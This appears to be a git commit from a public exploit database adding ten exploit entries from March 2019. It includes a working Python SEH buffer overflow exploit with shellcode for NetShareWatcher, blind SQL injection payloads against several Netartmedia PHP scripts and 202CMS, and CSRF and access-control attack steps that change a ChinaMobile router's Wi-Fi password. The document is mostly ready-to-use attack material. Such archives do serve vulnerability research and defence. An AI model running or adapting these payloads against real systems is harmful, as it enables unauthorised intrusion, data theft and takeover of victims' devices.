From 7bd54d5a917250977eeeb69d17f6bf3de4fa490f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 21 Mar 2019 05:02:08 +0000 Subject: [PATCH] DB: 2019-03-21 10 changes to exploits/shellcodes NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow Netartmedia PHP Car Dealer - SQL Injection Netartmedia PHP Real Estate Agency 4.0 - SQL Injection Netartmedia Jobs Portal 6.1 - SQL Injection Netartmedia PHP Dating Site - SQL Injection Netartmedia PHP Business Directory 4.2 - SQL Injection 202CMS v10beta - Multiple SQL Injection PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery Netartmedia Deals Portal - 'Email' SQL Injection --- exploits/hardware/webapps/46580.txt | 70 +++++++++++++++++++++++++++++ exploits/hardware/webapps/46581.txt | 50 +++++++++++++++++++++ exploits/php/webapps/46573.txt | 20 +++++++++ exploits/php/webapps/46574.txt | 17 +++++++ exploits/php/webapps/46575.txt | 14 ++++++ exploits/php/webapps/46576.txt | 16 +++++++ exploits/php/webapps/46577.txt | 13 ++++++ exploits/php/webapps/46579.txt | 50 +++++++++++++++++++++ exploits/php/webapps/46582.txt | 13 ++++++ exploits/windows/local/46578.py | 52 +++++++++++++++++++++ files_exploits.csv | 10 +++++ 11 files changed, 325 insertions(+) create mode 100644 exploits/hardware/webapps/46580.txt create mode 100644 exploits/hardware/webapps/46581.txt create mode 100644 exploits/php/webapps/46573.txt create mode 100644 exploits/php/webapps/46574.txt create mode 100644 exploits/php/webapps/46575.txt create mode 100644 exploits/php/webapps/46576.txt create mode 100644 exploits/php/webapps/46577.txt create mode 100644 exploits/php/webapps/46579.txt create mode 100644 exploits/php/webapps/46582.txt create mode 100755 exploits/windows/local/46578.py diff --git a/exploits/hardware/webapps/46580.txt b/exploits/hardware/webapps/46580.txt new file mode 100644 index 000000000..055047a90 --- /dev/null +++ b/exploits/hardware/webapps/46580.txt @@ -0,0 +1,70 @@ +# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access +Control +# Date: 14/01/2019 +# Exploit Author: Kumar Saurav +# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/ +# Vendor: ChinaMobile +# Category: Hardware +# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00) +# Tested on: Windows +# CVE : CVE-2019-6279 + +#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with +firmware +W2001EN-00 have an Incorrect Access Control vulnerability via the +cgi-bin/webproc?getpage=html/index.html +subpage=wlsecurity URI, allowing an Attacker to change the Wireless +Security Password. + +Reproduction Steps: +Step 1: Building a malicious html web page +Step 2: Attacker’s wants to change the wireless security (WPA/WPA2) key to +“PSWDmatlo331#@!” (in my case) + +Step 3: (192.168.59.254 in my Case) + + +
+ + + + + + + + + + + + + + + + + + +
+ + + +Step 4: save this as Incorrect_Access_Control.html +Step 5: Planting this malicious web page (Incorrect_Access_Control.html) +that are likely to be visited by the victim’s (by social engineering) or +any user connected in the Access Point (AP) will have to visit this page or +any attacker’s connected in the AP will trigger this exploit. +Step 6: After execution of above exploit, wireless security (WPA/WPA2) key +will change!! + +Note: This vulnerability allowing an attacker to reproduce without login. \ No newline at end of file diff --git a/exploits/hardware/webapps/46581.txt b/exploits/hardware/webapps/46581.txt new file mode 100644 index 000000000..1c1362638 --- /dev/null +++ b/exploits/hardware/webapps/46581.txt @@ -0,0 +1,50 @@ +# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery (CSRF) +# Date: 14/01/2019 +# Exploit Author: Kumar Saurav +# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/ +# Vendor: ChinaMobile +# Category: Hardware +# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00) +# Tested on: Windows +# CVE : CVE-2019-6282 + +#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with firmware +W2001EN-00 have CSRF vulnerability via the cgi-bin/webproc?getpage=html/index.html +subpage=wlsecurity URI, allowing an Attacker to change the Wireless Security Password. + +#Reproduction Steps: + +Note: This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated. + +Step 1: User login to PLC wireless router + +Step 2: User visits the attacker's malicious web page (PLC_CSRF.html) + +Step 3: PLC_CSRF.html exploits CSRF vulnerability and changes the wireless Security (WPA/WPA2) key to "PSWDmatlo331#@!" + +Step 4: (192.168.59.254 in my Case) + + + +
+ + + + + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46573.txt b/exploits/php/webapps/46573.txt new file mode 100644 index 000000000..16e16fb79 --- /dev/null +++ b/exploits/php/webapps/46573.txt @@ -0,0 +1,20 @@ +# Exploit Title: Netartmedia PHP Car Dealer- SQL Injection +# Date: 19.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.netartmedia.net/autodealer/ +# Demo Site: https://www.phpscriptdemos.com/autodealer/ +# Version: Lastest +# Tested on: Kali Linux +# CVE: N/A +# Description:The PHP Car Dealer script is also using a flexible +template system - the + templates can be modified or new ones to be created in order to +completely customize the website look and feel. + +----- PoC 1 SQLi ----- + +Request: http://localhost/[PATH]/index.php + +Parameter features[] (POST) + +Payload:body_style=&car_make=&car_model=1&condition=&exterior_color=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&fuel_type=&max_mileage=&mod=search&only_pictures=1&order_by=date&price_from=1&price_to=1&search_keyword=&search_type=search_form&transmission=&type=1&year= \ No newline at end of file diff --git a/exploits/php/webapps/46574.txt b/exploits/php/webapps/46574.txt new file mode 100644 index 000000000..8cfb41f56 --- /dev/null +++ b/exploits/php/webapps/46574.txt @@ -0,0 +1,17 @@ +# Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection +# Date: 19.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.netartmedia.net/propertyagency/ +# Demo Site: https://www.phpscriptdemos.com/agency/ +# Version: 4.0 +# Tested on: Kali Linux +# CVE: N/A +# Description:PHP Real Estate Agency is a web software written in PHP +especially designed for real estate agencies to help create quickly +and launch their own websites with their listings and information on +it. +----- PoC SQLi ----- + +Request: http://localhost/[PATH]/index.php +Parameter: features[] (POST) +Payload: ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1 \ No newline at end of file diff --git a/exploits/php/webapps/46575.txt b/exploits/php/webapps/46575.txt new file mode 100644 index 000000000..c6231f857 --- /dev/null +++ b/exploits/php/webapps/46575.txt @@ -0,0 +1,14 @@ +# Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection +# Date: 19.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.netartmedia.net/jobsportal/ +# Demo Site: https://www.ittjobs.com/ +# Version: 6.1 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC SQLi ----- + +Request: http://localhost/[PATH]/loginaction.php +Parameter: Email (POST) +Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login \ No newline at end of file diff --git a/exploits/php/webapps/46576.txt b/exploits/php/webapps/46576.txt new file mode 100644 index 000000000..67c3f4b33 --- /dev/null +++ b/exploits/php/webapps/46576.txt @@ -0,0 +1,16 @@ +# Exploit Title: Netartmedia Php Dating Site - SQL Injection +# Date: 19.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.netartmedia.net/datingsite/ +# Demo Site: https://www.phpscriptdemos.com/dating/ +# Version: Lastest +# Tested on: Kali Linux +# CVE: N/A +# Description: PHP Dating Site is a complete web system for creating +advanced and modern online dating websites. + + ----- PoC SQLi ----- + +Request: http://localhost/[PATH]/loginaction.php +Parameter: Email (POST) +Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login \ No newline at end of file diff --git a/exploits/php/webapps/46577.txt b/exploits/php/webapps/46577.txt new file mode 100644 index 000000000..abed1a348 --- /dev/null +++ b/exploits/php/webapps/46577.txt @@ -0,0 +1,13 @@ +# Exploit Title: Netartmedia PHP Business Directory 4.2 - SQL Injection +# Date: 19.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.phpbusinessdirectory.com/ +# Demo Site: https://www.bizwebdirectory.com/ +# Version: 4.2 +# Tested on: Kali Linux +# CVE: N/A + ----- PoC SQLi ----- + +Request: http://localhost/[PATH]/USERS/loginaction.php +Parameter: Email (POST) +Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login \ No newline at end of file diff --git a/exploits/php/webapps/46579.txt b/exploits/php/webapps/46579.txt new file mode 100644 index 000000000..540d0377a --- /dev/null +++ b/exploits/php/webapps/46579.txt @@ -0,0 +1,50 @@ +=========================================================================================== +# Exploit Title: 202CMS - 'log_user' SQL Inj. +# Dork: N/A +# Date: 20-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://sourceforge.net/projects/b202cms/ +# Software Link: https://sourceforge.net/projects/b202cms/ +# Version: v10 beta +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: 202CMS is small, but functionally CMS. It is based +on Twitter Bootstrap + This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is +highly customizable + and extremely easy to setup. The script is not finished, but soon I'm +going to finish it. +=========================================================================================== +# POC - SQLi (blind) +# Parameters : log_user +# Attack Pattern : +1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f +# POST Method : http://localhost/202cms10beta/index.php +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: 202CMS - 'register.php' SQL Inj. +# Dork: N/A +# Date: 20-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://sourceforge.net/projects/b202cms/ +# Software Link: https://sourceforge.net/projects/b202cms/ +# Version: v10 beta +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: 202CMS is small, but functionally CMS. It is based +on Twitter Bootstrap + This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is +highly customizable + and extremely easy to setup. The script is not finished, but soon I'm +going to finish it. +=========================================================================================== +# POC - SQLi (blind) +# Parameters : register.php, reg_user,reg_mail +# Attack Pattern : +1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f +# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27 +# POST Method : http://localhost/202cms10beta/register.php +=========================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/46582.txt b/exploits/php/webapps/46582.txt new file mode 100644 index 000000000..a791e12b3 --- /dev/null +++ b/exploits/php/webapps/46582.txt @@ -0,0 +1,13 @@ +# Exploit Title: Netartmedia Deals Portal - 'Email' SQL Injection +# Date: 20.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.netartmedia.net/dealsportal/ +# Demo Site: https://www.phpscriptdemos.com/deals/i +# Version: Lastest +# Tested on: Kali Linux +# CVE: N/A +----- PoC: SQLi ----- +# Request: http://localhost/[PATH]/loginaction.php +# Vulnerable Parameter: Email (POST) +# Attack Pattern: +Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login \ No newline at end of file diff --git a/exploits/windows/local/46578.py b/exploits/windows/local/46578.py new file mode 100755 index 000000000..6047c5777 --- /dev/null +++ b/exploits/windows/local/46578.py @@ -0,0 +1,52 @@ +# Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow +# Date: 2019-03-19 +# Vendor Homepage: http://netsharewatcher.nsauditor.com +# Software Link: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe +# Exploit Author: Peyman Forouzan +# Tested Version: 1.5.8.0 +# Tested on: Windows XP SP2 - SP3 + +# 1- Run python code : NetShareWatcher.py +# 2- Open Exploit.txt and copy content to clipboard +# 3- Open NetShareWatcher +# 4- Setting --> Defaults --> Restrictions --> Add --> Custome +# 5- Paste the content of Exploit.txt into the box +# 6- Click 'Find' +# 7- Calc.exe Open ( Can be replaced with Shellcode ) + +#!/usr/bin/python + +buffer = "\x41" * 262 +nseh = "\xeb\x14\x90\x90" # Overwrite Next Seh With Short jmp +seh = "\x90\xBF\xC9\x74" # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll] +nops = "\x90" * 20 + +# Calc.exe payload [size 227] +buf ="" +buf += "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9" +buf += "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92" +buf += "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84" +buf += "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e" +buf += "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1" +buf += "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27" +buf += "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb" +buf += "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b" +buf += "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2" +buf += "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37" +buf += "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3" +buf += "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef" +buf += "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb" +buf += "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf" +buf += "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83" +buf += "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3" +buf += "\x9a\xca\xc0"; + +payload = buffer + nseh + seh + nops + buf +try: + f=open("Exploit.txt","w") + print "[+] Creating %s bytes payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File can't be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 39689bdb1..80de45bd2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10371,6 +10371,7 @@ id,file,description,date,author,type,platform,port 46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows, 46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows, 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows, +46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -41015,3 +41016,12 @@ id,file,description,date,author,type,platform,port 46560,exploits/php/webapps/46560.txt,"Netartmedia Event Portal 2.0 - 'Email' SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80 46562,exploits/php/webapps/46562.txt,"Netartmedia PHP Mall 4.1 - SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80 46563,exploits/php/webapps/46563.txt,"Netartmedia Real Estate Portal 5.0 - SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80 +46573,exploits/php/webapps/46573.txt,"Netartmedia PHP Car Dealer - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80 +46574,exploits/php/webapps/46574.txt,"Netartmedia PHP Real Estate Agency 4.0 - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80 +46575,exploits/php/webapps/46575.txt,"Netartmedia Jobs Portal 6.1 - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80 +46576,exploits/php/webapps/46576.txt,"Netartmedia PHP Dating Site - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80 +46577,exploits/php/webapps/46577.txt,"Netartmedia PHP Business Directory 4.2 - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80 +46579,exploits/php/webapps/46579.txt,"202CMS v10beta - Multiple SQL Injection",2019-03-20,"Mehmet EMIROGLU",webapps,php,80 +46580,exploits/hardware/webapps/46580.txt,"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control",2019-03-20,"Kumar Saurav",webapps,hardware,80 +46581,exploits/hardware/webapps/46581.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery",2019-03-20,"Kumar Saurav",webapps,hardware,80 +46582,exploits/php/webapps/46582.txt,"Netartmedia Deals Portal - 'Email' SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80